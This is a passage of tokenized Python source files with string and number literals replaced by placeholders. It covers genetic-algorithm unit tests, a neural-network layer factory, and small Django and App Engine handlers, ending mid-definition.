calculate_population_fitness ( ) <EOL> self . ga . tournament_size = <NUM_LIT:0> <EOL> self . ga . selection_function = self . ga . tournament_selection <EOL> individual = self . ga . selection_function ( self . ga . current_generation ) <EOL> assert len ( individual . genes ) == <NUM_LIT:5> <EOL> assert individual in self . population <EOL> def test_selection_function_3 ( self ) : <EOL> '''<STR_LIT>''' <EOL> self . ga . selection_function = self . ga . random_selection <EOL> individual = self . ga . selection_function ( self . population ) <EOL> assert len ( individual . genes ) == <NUM_LIT:5> <EOL> assert individual in self . population <EOL> def test_create_individual ( self ) : <EOL> data = self . ga . seed_data <EOL> individual = self . ga . create_individual ( data ) <EOL> assert len ( individual ) == <NUM_LIT:5> <EOL> assert all ( [ ind in ( <NUM_LIT:0> , <NUM_LIT:1> ) for ind in individual if ind in ( <NUM_LIT:0> , <NUM_LIT:1> ) ] ) <EOL> def test_create_initial_population ( self ) : <EOL> pop_size = self . ga . population_size <EOL> self . ga . create_initial_population ( ) <EOL> initial_pop = self . ga . current_generation <EOL> assert len ( initial_pop ) == pop_size <EOL> assert isinstance ( initial_pop [ <NUM_LIT:0> ] , type ( pyeasyga . Chromosome ( [ <NUM_LIT:1> ] ) ) ) <EOL> assert sum ( [ member . fitness for member in initial_pop ] ) == <NUM_LIT:0> <EOL> def test_calculate_population_fitness ( self ) : <EOL> self . ga . current_generation = self . population <EOL> self . ga . calculate_population_fitness ( ) <EOL> current_gen = self . ga . current_generation <EOL> assert sum ( [ member . fitness for member in current_gen ] ) > <NUM_LIT:0> <EOL> def test_rank_population ( self ) : <EOL> self . ga . create_initial_population ( ) <EOL> self . ga . calculate_population_fitness ( ) <EOL> new_population = copy . deepcopy ( self . ga . current_generation ) <EOL> new_population . sort ( key = attrgetter ( '<STR_LIT>' ) , reverse = True ) <EOL> self . ga . rank_population ( ) <EOL> current_gen = self . ga . current_generation <EOL> assert current_gen [ <NUM_LIT:0> ] . fitness == new_population [ <NUM_LIT:0> ] . fitness <EOL> assert current_gen [ <NUM_LIT:1> ] . fitness == new_population [ <NUM_LIT:1> ] . fitness <EOL> def test_create_new_population ( self ) : <EOL> """<STR_LIT>""" <EOL> pop_size = self . ga . population_size <EOL> self . ga . create_initial_population ( ) <EOL> self . ga . calculate_population_fitness ( ) <EOL> self . ga . rank_population ( ) <EOL> self . ga . create_new_population ( ) <EOL> current_gen = self . ga . current_generation <EOL> assert len ( current_gen ) == pop_size <EOL> assert isinstance ( current_gen [ <NUM_LIT:0> ] , type ( pyeasyga . Chromosome ( [ <NUM_LIT:1> ] ) ) ) <EOL> def test_create_first_generation ( self ) : <EOL> """<STR_LIT>""" <EOL> pop_size = self . ga . population_size <EOL> self . ga . create_first_generation ( ) <EOL> current_gen = self . ga . current_generation <EOL> assert len ( current_gen ) == pop_size <EOL> assert isinstance ( current_gen [ <NUM_LIT:0> ] , type ( pyeasyga . Chromosome ( [ <NUM_LIT:1> ] ) ) ) <EOL> def test_create_next_generation ( self ) : <EOL> pop_size = self . ga . population_size <EOL> self . ga . create_first_generation ( ) <EOL> self . ga . create_next_generation ( ) <EOL> current_gen = self . ga . current_generation <EOL> assert len ( current_gen ) == pop_size <EOL> assert isinstance ( current_gen [ <NUM_LIT:0> ] , type ( pyeasyga . Chromosome ( [ <NUM_LIT:1> ] ) ) ) <EOL> def test_run ( self ) : <EOL> self . ga . run ( ) <EOL> current_gen = self . ga . current_generation <EOL> last_generation = self . ga . last_generation ( ) <EOL> assert len ( current_gen ) == self . ga . population_size <EOL> assert isinstance ( current_gen [ <NUM_LIT:0> ] , type ( pyeasyga . Chromosome ( [ <NUM_LIT:1> ] ) ) ) <EOL> assert isinstance ( next ( last_generation ) , type ( ( <NUM_LIT:1> , [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] ) ) ) <EOL> assert len ( next ( last_generation ) ) == <NUM_LIT:2> <EOL> assert len ( next ( last_generation ) [ <NUM_LIT:1> ] ) == <NUM_LIT:5> <EOL> def test_best_individual ( self ) : <EOL> self . ga . create_first_generation ( ) <EOL> best_fitness , best_genes = self . ga . best_individual ( ) <EOL> assert best_fitness == self . ga . current_generation [ <NUM_LIT:0> ] . fitness <EOL> assert best_genes == self . ga . current_generation [ <NUM_LIT:0> ] . genes <EOL> def test_last_generation ( self ) : <EOL> self . ga . create_first_generation ( ) <EOL> last_generation = self . ga . last_generation ( ) <EOL> assert isinstance ( next ( last_generation ) , type ( ( <NUM_LIT:1> , [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] ) ) ) <EOL> assert len ( next ( last_generation ) ) == <NUM_LIT:2> <EOL> assert len ( next ( last_generation ) [ <NUM_LIT:1> ] ) == <NUM_LIT:5> <EOL> def tearDown ( self ) : <EOL> pass <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> import os <EOL> import sys <EOL> try : <EOL> from gitobox . main import main <EOL> except ImportError : <EOL> sys . path . append ( os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT:..>' ) ) <EOL> from gitobox . main import main <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> </s>
<s> import unittest <EOL> import arff <EOL> class TestEncodeComment ( unittest . TestCase ) : <EOL> def get_encoder ( self ) : <EOL> decoder = arff . ArffEncoder ( ) <EOL> return decoder <EOL> def test_simple ( self ) : <EOL> encoder = self . get_encoder ( ) <EOL> fixture = u'<STR_LIT>' <EOL> result = encoder . _encode_comment ( fixture ) <EOL> expected = u'<STR_LIT>' <EOL> self . assertEqual ( result , expected ) </s>
<s> __all__ = [ '<STR_LIT>' , '<STR_LIT>' ] </s>
<s> import glob <EOL> import unittest <EOL> test_file_strings = glob . glob ( '<STR_LIT>' ) <EOL> module_strings = [ str [ <NUM_LIT:0> : len ( str ) - <NUM_LIT:3> ] for str in test_file_strings ] <EOL> suites = [ unittest . defaultTestLoader . loadTestsFromName ( str ) for str <EOL> in module_strings ] <EOL> testSuite = unittest . TestSuite ( suites ) <EOL> text_runner = unittest . TextTestRunner ( ) . run ( testSuite ) </s>
<s> from lstm_old import * <EOL> from lut import * <EOL> from reshape import * <EOL> from inner_prod import * <EOL> from dropout import * <EOL> from sequential import * <EOL> from const_weights import * <EOL> from const_value import * <EOL> from cos_sim import * <EOL> from lstm import * <EOL> from sum_prod import * <EOL> from selector import * <EOL> from sum2 import * <EOL> from conv1d import * <EOL> from maxpool1d import * <EOL> from meanpool1d import * <EOL> from normalize import * <EOL> from ordinal import * <EOL> from scipy import sparse <EOL> import h5py <EOL> import pickle <EOL> def routeFn ( name ) : <EOL> if name == '<STR_LIT>' : <EOL> return crossEntOne <EOL> elif name == '<STR_LIT>' : <EOL> return crossEntIdx <EOL> elif name == '<STR_LIT>' : <EOL> return crossEntOneIdx <EOL> elif name == '<STR_LIT>' : <EOL> return crossEntOneAccIdx <EOL> elif name == '<STR_LIT>' : <EOL> return rankingLoss <EOL> elif name == '<STR_LIT>' : <EOL> return hardLimit <EOL> elif name == '<STR_LIT>' : <EOL> return argmax <EOL> elif name == '<STR_LIT>' : <EOL> return argmaxDiff <EOL> elif name == '<STR_LIT>' : <EOL> return SigmoidActiveFn <EOL> elif name == '<STR_LIT>' : <EOL> return SoftmaxActiveFn <EOL> elif name == '<STR_LIT>' : <EOL> return TanhActiveFn <EOL> elif name == '<STR_LIT>' : <EOL> return IdentityActiveFn <EOL> elif name == '<STR_LIT:relu>' : <EOL> return ReluActiveFn <EOL> elif name == '<STR_LIT>' : <EOL> return meanSqErr <EOL> elif name == '<STR_LIT>' : <EOL> return meanSqErrEye <EOL> elif name == '<STR_LIT>' : <EOL> return roundInt <EOL> else : <EOL> raise Exception ( '<STR_LIT>' + name + '<STR_LIT>' ) <EOL> pass <EOL> stageLib = { } <EOL> def routeStage ( name ) : <EOL> return stageLib [ name ] <EOL> def addStage ( stageDict ) : <EOL> stage = None <EOL> initSeed = stageDict [ '<STR_LIT>' ] if stageDict . has_key ( '<STR_LIT>' ) else <NUM_LIT:0> <EOL> initRange = stageDict [ '<STR_LIT>' ] if stageDict . has_key ( '<STR_LIT>' ) else <NUM_LIT:1.0> <EOL> if stageDict . has_key ( '<STR_LIT>' ) : <EOL> print '<STR_LIT>' , stageDict [ '<STR_LIT:name>' ] <EOL> print '<STR_LIT>' , stageDict [ '<STR_LIT>' ] <EOL> if stageDict . has_key ( '<STR_LIT>' ) : <EOL> if stageDict [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> initWeights = np . loadtxt ( stageDict [ '<STR_LIT>' ] ) <EOL> elif stageDict [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> initWeightsFile = h5py . File ( stageDict [ '<STR_LIT>' ] ) <EOL> if stageDict . has_key ( '<STR_LIT>' ) and stageDict [ '<STR_LIT>' ] : <EOL> key = stageDict [ '<STR_LIT>' ] <EOL> iwShape = initWeightsFile [ key + '<STR_LIT>' ] [ : ] <EOL> iwData = initWeightsFile [ key + '<STR_LIT>' ] [ : ] <EOL> iwInd = initWeightsFile [ key + '<STR_LIT>' ] [ : ] <EOL> iwPtr = initWeightsFile [ key + '<STR_LIT>' ] [ : ] <EOL> initWeights = sparse . csr_matrix ( <EOL> ( iwData , iwInd , iwPtr ) , shape = iwShape ) <EOL> else : <EOL> initWeights = initWeightsFile [ stageDict [ '<STR_LIT>' ] ] [ : ] <EOL> print initWeights . shape <EOL> elif stageDict [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> initWeights = np . load ( stageDict [ '<STR_LIT>' ] ) <EOL> else : <EOL> raise Exception ( <EOL> '<STR_LIT>' % stageDict [ '<STR_LIT>' ] ) <EOL> else : <EOL> initWeights = np . load ( stageDict [ '<STR_LIT>' ] ) <EOL> else : <EOL> initWeights = <NUM_LIT:0> <EOL> needInit = False if stageDict . has_key ( '<STR_LIT>' ) else True <EOL> biasInitConst = stageDict [ '<STR_LIT>' ] if stageDict . has_key ( '<STR_LIT>' ) else - <NUM_LIT:1.0> <EOL> learningRate = stageDict [ '<STR_LIT>' ] if stageDict . has_key ( '<STR_LIT>' ) else <NUM_LIT:0.0> <EOL> learningRateAnnealConst = stageDict [ '<STR_LIT>' ] if stageDict . has_key ( '<STR_LIT>' ) else <NUM_LIT:0.0> <EOL> momentum = stageDict [ '<STR_LIT>' ] if stageDict . has_key ( '<STR_LIT>' ) else <NUM_LIT:0.0> <EOL> deltaMomentum = stageDict [ '<STR_LIT>' ] if stageDict . has_key ( '<STR_LIT>' ) else <NUM_LIT:0.0> <EOL> gradientClip = stageDict [ '<STR_LIT>' ] if stageDict . has_key ( '<STR_LIT>' ) else <NUM_LIT:0.0> <EOL> weightClip = stageDict [ '<STR_LIT>' ] if stageDict . has_key ( '<STR_LIT>' ) else <NUM_LIT:0.0> <EOL> weightRegConst = stageDict [ '<STR_LIT>' ] if stageDict . has_key ( '<STR_LIT>' ) else <NUM_LIT:0.0> <EOL> outputdEdX = stageDict [ '<STR_LIT>' ] if stageDict . has_key ( '<STR_LIT>' ) else True <EOL> defaultValue = ( np . zeros ( stageDict [ '<STR_LIT>' ] ) + stageDict [ '<STR_LIT>' ] ) if stageDict . has_key ( '<STR_LIT>' ) else <NUM_LIT:0.0> <EOL> if stageDict . has_key ( '<STR_LIT>' ) : <EOL> inputList = stageDict [ '<STR_LIT>' ] . split ( '<STR_LIT:U+002C>' ) <EOL> for i in range ( len ( inputList ) ) : <EOL> inputList [ i ] = inputList [ i ] . strip ( ) <EOL> else : <EOL> inputList = None <EOL> if stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = LSTM_Old ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> inputDim = stageDict [ '<STR_LIT>' ] , <EOL> outputDim = stageDict [ '<STR_LIT>' ] , <EOL> inputNames = inputList , <EOL> initSeed = initSeed , <EOL> initRange = initRange , <EOL> initWeights = initWeights , <EOL> needInit = needInit , <EOL> cutOffZeroEnd = stageDict [ '<STR_LIT>' ] , <EOL> multiErr = stageDict [ '<STR_LIT>' ] , <EOL> learningRate = learningRate , <EOL> learningRateAnnealConst = learningRateAnnealConst , <EOL> momentum = momentum , <EOL> deltaMomentum = deltaMomentum , <EOL> gradientClip = gradientClip , <EOL> weightClip = weightClip , <EOL> weightRegConst = weightRegConst , <EOL> outputdEdX = outputdEdX <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = LSTM ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> inputDim = stageDict [ '<STR_LIT>' ] , <EOL> outputDim = stageDict [ '<STR_LIT>' ] , <EOL> inputNames = inputList , <EOL> timespan = stageDict [ '<STR_LIT>' ] , <EOL> defaultValue = defaultValue , <EOL> initSeed = initSeed , <EOL> initRange = initRange , <EOL> initWeights = initWeights , <EOL> needInit = needInit , <EOL> multiInput = stageDict [ '<STR_LIT>' ] if stageDict . has_key ( '<STR_LIT>' ) else True , <EOL> multiOutput = stageDict [ '<STR_LIT>' ] if stageDict . has_key ( '<STR_LIT>' ) else stageDict [ '<STR_LIT>' ] , <EOL> cutOffZeroEnd = stageDict [ '<STR_LIT>' ] if stageDict . has_key ( '<STR_LIT>' ) else True , <EOL> learningRate = learningRate , <EOL> learningRateAnnealConst = learningRateAnnealConst , <EOL> momentum = momentum , <EOL> deltaMomentum = deltaMomentum , <EOL> gradientClip = gradientClip , <EOL> weightClip = weightClip , <EOL> weightRegConst = weightRegConst , <EOL> outputdEdX = outputdEdX <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = LUT ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> inputDim = stageDict [ '<STR_LIT>' ] , <EOL> outputDim = stageDict [ '<STR_LIT>' ] , <EOL> inputNames = inputList , <EOL> lazyInit = stageDict [ '<STR_LIT>' ] if stageDict . has_key ( '<STR_LIT>' ) else True , <EOL> initSeed = initSeed , <EOL> initRange = initRange , <EOL> initWeights = initWeights , <EOL> intConversion = stageDict [ '<STR_LIT>' ] if stageDict . has_key ( '<STR_LIT>' ) else False , <EOL> sparse = stageDict [ '<STR_LIT>' ] == True if stageDict . has_key ( '<STR_LIT>' ) else False , <EOL> needInit = needInit , <EOL> learningRate = learningRate , <EOL> learningRateAnnealConst = learningRateAnnealConst , <EOL> momentum = momentum , <EOL> deltaMomentum = deltaMomentum , <EOL> gradientClip = gradientClip , <EOL> weightClip = weightClip , <EOL> weightRegConst = weightRegConst , <EOL> outputdEdX = stageDict [ '<STR_LIT>' ] if stageDict . has_key ( '<STR_LIT>' ) else False <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = Map ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> outputDim = stageDict [ '<STR_LIT>' ] , <EOL> inputNames = inputList , <EOL> activeFn = routeFn ( stageDict [ '<STR_LIT>' ] ) , <EOL> initSeed = initSeed , <EOL> initRange = initRange , <EOL> initWeights = initWeights , <EOL> initType = stageDict [ '<STR_LIT>' ] if stageDict . has_key ( '<STR_LIT>' ) else '<STR_LIT>' , <EOL> bias = stageDict [ '<STR_LIT>' ] if stageDict . has_key ( '<STR_LIT>' ) else True , <EOL> biasInitConst = biasInitConst , <EOL> needInit = needInit , <EOL> learningRate = learningRate , <EOL> learningRateAnnealConst = learningRateAnnealConst , <EOL> momentum = momentum , <EOL> deltaMomentum = deltaMomentum , <EOL> gradientClip = gradientClip , <EOL> weightClip = weightClip , <EOL> weightRegConst = weightRegConst , <EOL> outputdEdX = outputdEdX <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = TimeUnfold ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> inputNames = inputList , <EOL> outputdEdX = outputdEdX ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = Concat ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> inputNames = inputList , <EOL> axis = stageDict [ '<STR_LIT>' ] ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = InnerProduct ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> inputNames = inputList , <EOL> outputDim = stageDict [ '<STR_LIT>' ] , <EOL> learningRate = learningRate , <EOL> learningRateAnnealConst = learningRateAnnealConst , <EOL> momentum = momentum , <EOL> deltaMomentum = deltaMomentum ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = TimeRepeat ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> numRepeats = stageDict [ '<STR_LIT>' ] , <EOL> inputNames = inputList , <EOL> outputdEdX = outputdEdX <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = TimeFold ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> timespan = stageDict [ '<STR_LIT>' ] , <EOL> inputNames = inputList , <EOL> outputdEdX = outputdEdX <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = TimeReverse ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> inputNames = inputList , <EOL> outputdEdX = outputdEdX <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = TimeFinal ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> inputNames = inputList , <EOL> outputdEdX = outputdEdX <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = Reshape ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> reshapeFn = stageDict [ '<STR_LIT>' ] , <EOL> inputNames = inputList , <EOL> outputDim = stageDict [ '<STR_LIT>' ] <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = Dropout ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> dropoutRate = stageDict [ '<STR_LIT>' ] , <EOL> initSeed = stageDict [ '<STR_LIT>' ] , <EOL> inputNames = inputList , <EOL> outputDim = stageDict [ '<STR_LIT>' ] <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stages = stageDict [ '<STR_LIT>' ] <EOL> realStages = [ ] <EOL> for i in range ( len ( stages ) ) : <EOL> realStages . append ( stageLib [ stages [ i ] ] ) <EOL> stage = Sequential ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> stages = realStages , <EOL> inputNames = inputList , <EOL> outputDim = stageDict [ '<STR_LIT>' ] , <EOL> outputdEdX = outputdEdX <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = ConstWeights ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> inputDim = stageDict [ '<STR_LIT>' ] , <EOL> outputDim = stageDict [ '<STR_LIT>' ] , <EOL> initSeed = initSeed , <EOL> initRange = initRange , <EOL> initWeights = initWeights , <EOL> needInit = needInit , <EOL> learningRate = learningRate , <EOL> learningRateAnnealConst = learningRateAnnealConst , <EOL> momentum = momentum , <EOL> deltaMomentum = deltaMomentum , <EOL> gradientClip = gradientClip , <EOL> weightClip = weightClip , <EOL> weightRegConst = weightRegConst <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = ConstValue ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> inputNames = inputList , <EOL> outputDim = stageDict [ '<STR_LIT>' ] , <EOL> value = stageDict [ '<STR_LIT:value>' ] <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = CosSimilarity ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> inputNames = inputList , <EOL> outputDim = <NUM_LIT:0> , <EOL> bankDim = stageDict [ '<STR_LIT>' ] <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = ElementProduct ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> inputNames = inputList , <EOL> outputDim = stageDict [ '<STR_LIT>' ] <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = Selector ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> inputNames = inputList , <EOL> axis = stageDict [ '<STR_LIT>' ] if stageDict . has_key ( '<STR_LIT>' ) else - <NUM_LIT:1> , <EOL> start = stageDict [ '<STR_LIT:start>' ] , <EOL> end = stageDict [ '<STR_LIT:end>' ] <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = Reshape ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> inputNames = inputList , <EOL> reshapeFn = stageDict [ '<STR_LIT>' ] , <EOL> outputdEdX = outputdEdX <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = Sum ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> inputNames = inputList , <EOL> numComponents = stageDict [ '<STR_LIT>' ] , <EOL> outputDim = stageDict [ '<STR_LIT>' ] , <EOL> defaultValue = defaultValue <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = ElementProduct ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> inputNames = inputList , <EOL> outputDim = stageDict [ '<STR_LIT>' ] , <EOL> defaultValue = defaultValue <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = Active ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> inputNames = inputList , <EOL> outputDim = stageDict [ '<STR_LIT>' ] , <EOL> activeFn = routeFn ( stageDict [ '<STR_LIT>' ] ) , <EOL> defaultValue = defaultValue <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = SumProduct ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> inputNames = inputList , <EOL> sumAxis = stageDict [ '<STR_LIT>' ] , <EOL> beta = stageDict [ '<STR_LIT>' ] if stageDict . has_key ( '<STR_LIT>' ) else <NUM_LIT:1.0> , <EOL> outputDim = stageDict [ '<STR_LIT>' ] <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stages = stageDict [ '<STR_LIT>' ] <EOL> realStages = [ ] <EOL> for i in range ( len ( stages ) ) : <EOL> realStages . append ( stageLib [ stages [ i ] ] ) <EOL> outputList = stageDict [ '<STR_LIT>' ] . split ( '<STR_LIT:U+002C>' ) <EOL> for i in range ( len ( outputList ) ) : <EOL> outputList [ i ] = outputList [ i ] . strip ( ) <EOL> stage = RecurrentContainer ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> inputDim = stageDict [ '<STR_LIT>' ] , <EOL> outputDim = stageDict [ '<STR_LIT>' ] , <EOL> inputNames = inputList , <EOL> timespan = stageDict [ '<STR_LIT>' ] , <EOL> stages = realStages , <EOL> multiInput = stageDict [ '<STR_LIT>' ] if stageDict . has_key ( '<STR_LIT>' ) else True , <EOL> multiOutput = stageDict [ '<STR_LIT>' ] , <EOL> cutOffZeroEnd = stageDict [ '<STR_LIT>' ] if stageDict . has_key ( '<STR_LIT>' ) else True , <EOL> outputStageNames = outputList , <EOL> outputdEdX = outputdEdX <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = AttentionPenalty ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> inputNames = inputList , <EOL> errorConst = stageDict [ '<STR_LIT>' ] <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = Sum2 ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> inputNames = inputList , <EOL> outputDim = stageDict [ '<STR_LIT>' ] <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = Conv1D ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> inputNames = inputList , <EOL> numFilters = stageDict [ '<STR_LIT>' ] , <EOL> numChannels = stageDict [ '<STR_LIT>' ] , <EOL> windowSize = stageDict [ '<STR_LIT>' ] , <EOL> initSeed = initSeed , <EOL> initRange = initRange , <EOL> initWeights = initWeights , <EOL> needInit = needInit , <EOL> learningRate = learningRate , <EOL> learningRateAnnealConst = learningRateAnnealConst , <EOL> momentum = momentum , <EOL> deltaMomentum = deltaMomentum , <EOL> gradientClip = gradientClip , <EOL> weightClip = weightClip , <EOL> weightRegConst = weightRegConst , <EOL> outputdEdX = outputdEdX <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = MaxPool1D ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> inputNames = inputList , <EOL> windowSize = stageDict [ '<STR_LIT>' ] , <EOL> outputDim = stageDict [ '<STR_LIT>' ] , <EOL> outputdEdX = outputdEdX <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = MeanPool1D ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> inputNames = inputList , <EOL> windowSize = stageDict [ '<STR_LIT>' ] , <EOL> outputDim = stageDict [ '<STR_LIT>' ] , <EOL> outputdEdX = outputdEdX <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> if stageDict . has_key ( '<STR_LIT>' ) and stageDict [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> mean = h5py . File ( stageDict [ '<STR_LIT>' ] ) [ stageDict [ '<STR_LIT>' ] ] [ : ] <EOL> std = h5py . File ( stageDict [ '<STR_LIT>' ] ) [ stageDict [ '<STR_LIT>' ] ] [ : ] <EOL> else : <EOL> mean = np . load ( stageDict [ '<STR_LIT>' ] ) <EOL> std = np . load ( stageDict [ '<STR_LIT>' ] ) <EOL> stage = Normalize ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> inputNames = inputList , <EOL> mean = mean , <EOL> std = std , <EOL> outputDim = stageDict [ '<STR_LIT>' ] , <EOL> outputdEdX = outputdEdX <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = OrdinalRegression ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> inputNames = inputList , <EOL> outputDim = stageDict [ '<STR_LIT>' ] , <EOL> fixExtreme = stageDict [ '<STR_LIT>' ] if stageDict . has_key ( '<STR_LIT>' ) else True , <EOL> learningRate = learningRate , <EOL> learningRateAnnealConst = learningRateAnnealConst , <EOL> momentum = momentum , <EOL> deltaMomentum = deltaMomentum , <EOL> gradientClip = gradientClip , <EOL> weightClip = weightClip , <EOL> weightRegConst = weightRegConst , <EOL> outputdEdX = outputdEdX <EOL> ) <EOL> else : <EOL> raise Exception ( '<STR_LIT>' + stageDict [ '<STR_LIT:type>' ] + '<STR_LIT>' ) <EOL> if stageDict . has_key ( '<STR_LIT>' ) and stageDict [ '<STR_LIT>' ] : <EOL> stage = RecurrentAdapter ( stage ) <EOL> stageLib [ stageDict [ '<STR_LIT:name>' ] ] = stage <EOL> return stage </s>
<s> from model_test import * <EOL> from view_test import * <EOL> from templatetag_test import * <EOL> __test__ = { <EOL> "<STR_LIT>" : model_test , <EOL> "<STR_LIT>" : view_test , <EOL> "<STR_LIT>" : templatetag_test <EOL> } </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> from google . appengine . api . users import create_logout_url , get_current_user <EOL> from gaepermission import facade <EOL> from gaepermission . decorator import login_required <EOL> from tekton . gae . middleware . redirect import RedirectResponse <EOL> @ login_required <EOL> def index ( _resp ) : <EOL> facade . logout ( _resp ) . execute ( ) <EOL> redirect_url = '<STR_LIT:/>' <EOL> google_user = get_current_user ( ) <EOL> if google_user : <EOL> redirect_url = create_logout_url ( redirect_url ) <EOL> return RedirectResponse ( redirect_url ) </s>
<s> from django import forms <EOL> from django . conf import settings <EOL> from repocracy . repo . models import Repository , Remote , RemoteHost <EOL> from repocracy . repo . tasks import clone_repository <EOL> class NewRepoForm ( forms . ModelForm ) : <EOL> def clean_origin ( self ) : <EOL> data = self . cleaned_data [ '<STR_LIT>' ] <EOL> if data [ <NUM_LIT:0> ] == '<STR_LIT:/>' : <EOL> raise forms . ValidationError ( '<STR_LIT>' ) <EOL> if '<STR_LIT:@>' in data : <EOL> raise forms . ValidationError ( '<STR_LIT>' ) <EOL> if '<STR_LIT:;>' in data : <EOL> raise forms . ValidationError ( '<STR_LIT>' ) <EOL> return data <EOL> def save ( self , user ) : <EOL> obj = super ( NewRepoForm , self ) . save ( commit = False ) <EOL> obj . name = obj . guess_name ( ) <EOL> if user . is_authenticated ( ) : <EOL> obj . user = user <EOL> obj . slug = obj . get_slug ( ) <EOL> obj . save ( ) <EOL> clone_repository . delay ( obj . pk ) <EOL> return obj <EOL> class Meta : <EOL> model = Repository <EOL> fields = ( '<STR_LIT>' , ) <EOL> class RemoteForm ( forms . ModelForm ) : <EOL> username = forms . CharField ( max_length = <NUM_LIT:255> ) <EOL> repo_name = forms . CharField ( max_length = <NUM_LIT:255> ) <EOL> remote_url = forms . CharField ( max_length = <NUM_LIT:255> , required = False ) <EOL> type = forms . IntegerField ( widget = forms . RadioSelect ( choices = ( ( 